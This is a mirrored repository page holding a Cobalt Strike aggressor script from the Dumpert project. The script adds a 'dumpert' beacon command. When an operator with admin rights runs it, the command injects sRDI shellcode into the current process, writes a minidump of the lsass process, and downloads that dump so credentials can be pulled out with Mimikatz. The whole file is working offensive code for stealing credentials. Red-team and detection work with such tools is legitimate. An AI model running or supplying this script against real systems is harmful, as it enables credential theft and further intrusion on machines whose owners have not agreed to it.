mirror of
https://github.com/outflanknl/Dumpert.git
synced 2026-06-08 08:35:19 +00:00
Cn33liz
36 lines
1.1 KiB
Plaintext
36 lines
1.1 KiB
Plaintext
#author Cornelis de Plaa
|
|
#@outflank.nl
|
|
|
|
#injects a sRDI shellcode (shellcode Reflective DLL Injection) in current process and creates a minidump of lsass process.
|
|
#see https://github.com/monoxgas/sRDI
|
|
|
|
#register help
|
|
beacon_command_register("dumpert", "Create a minidump of lsass process",
|
|
"Synopsis: dumpert\n\n" .
|
|
"Creates a minidump of lsass process using sRDI shellcode injection and downloads minidump file.\n" .
|
|
"Lsass minidump can be imported in Mimikatz using: \"sekurlsa::minidump dumpert.dmp\"");
|
|
|
|
alias dumpert {
|
|
$bid = $1;
|
|
$curr_pid = beacon_info($bid, "pid");
|
|
|
|
if (-isadmin $bid) {
|
|
blog($bid, "Dumpert by Outflank");
|
|
if (-is64 $bid) {
|
|
bshinject($bid, $curr_pid, "x64", script_resource("Outflank-Dumpert.bin"));
|
|
blog($bid, "Waiting a few seconds for task to complete...");
|
|
bpause($bid, 10000);
|
|
bdownload($bid, "C:\\Windows\\Temp\\dumpert.dmp");
|
|
return;
|
|
}
|
|
else{
|
|
berror($bid, "Dumpert is x64 only.");
|
|
return;
|
|
}
|
|
}
|
|
else{
|
|
berror($bid, "You need elevated privileges.");
|
|
return;
|
|
}
|
|
}
|